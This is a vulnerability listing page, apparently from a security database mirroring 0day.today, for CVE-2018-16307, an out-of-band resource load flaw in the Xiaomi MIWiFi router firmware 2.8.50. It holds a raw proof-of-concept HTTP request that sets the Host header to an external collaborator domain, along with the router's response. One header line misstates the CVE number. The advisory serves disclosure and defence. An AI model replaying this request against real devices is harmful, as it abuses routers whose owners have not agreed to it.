Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Xiaomi MIWiFi Xiaomi_55DD 2.8.50 Out-Of-Band Resource Load Vulnerability

🗓️ 03 Sep 2018 00:00:00Reported by Mishra DhirajType 
zdt
 zdt🔗 0day.today👁 72 Views

MIWiFi Xiaomi_55DD 2.8.50 Out-Of-Band Resource Load Vulnerability CVE-2018-1630

Related
Code
ReporterTitlePublishedViews
Family
CNVD		Xiaomi MIWiFi Xiaomi_55DD Resource Loading Vulnerability
4 Sep 201800:00
cnvd
CVE		CVE-2018-16307
5 Sep 201821:00
cve
Cvelist		CVE-2018-16307
5 Sep 201821:00
cvelist
EUVD		EUVD-2018-8158
7 Oct 202500:30
euvd
NVD		CVE-2018-16307
5 Sep 201821:29
nvd
OSV		CVE-2018-16307
5 Sep 201821:29
osv
Packet Storm		MIWiFi Xiaomi_55DD 2.8.50 Out-Of-Band Resource Load
2 Sep 201800:00
packetstorm
Prion		Design/Logic Flaw
5 Sep 201821:29
prion
CVE: CVE-2018-16307
Issue: Out-of-band resource load
Product affected: MIWiFi Xiaomi_55DD Version 2.8.50

Summary:
An "Out-of-band resource load" issue was discovered on Xiaomi MIWiFi Xiaomi_55DD Version 2.8.50 devices. It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response. If a domain name (containing a random string) is used in the HTTP Host header, the application performs an HTTP request to the specified domain. The response from that request is then included in the application's own response.

## Request

POST /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.1/cgi-bin/luci/web/home
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 126
Cookie: __guid=86847064.3826147368769525000.1535781606575.13; monitor_count=9; psp=admin|||2|||0
Connection: close

username=admin&password=b2e8d6e552db587f3c283ce59c4d08fcbaf2cc9e&logtype=2&nonce=0_4c%3Abb%3A58%3A47%3A39%3A84_1535785091_2732

## Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 62
Connection: close
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
MiCGI-Switch: 1 0
MiCGI-TproxyInfo: 192.168.31.1:80
MiCGI-Upstream: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
MiCGI-Client-Ip: 192.168.31.237
MiCGI-Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
MiCGI-Http-Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
MiCGI-Server-Ip: 192.168.31.1
MiCGI-Server-Port: 80
MiCGI-Status: AUTOPROXY
MiCGI-Preload: no

<html><body>x4e809xt6zpgky5b16f6dezjlglgkugifigz</body></html>

#  0day.today [2018-09-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Sep 2018 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.00285
xiaomimiwifi xiaomi_55ddout-of-band resource loadvulnerabilitycve-2018-16307httpburp collaboratorexploit
72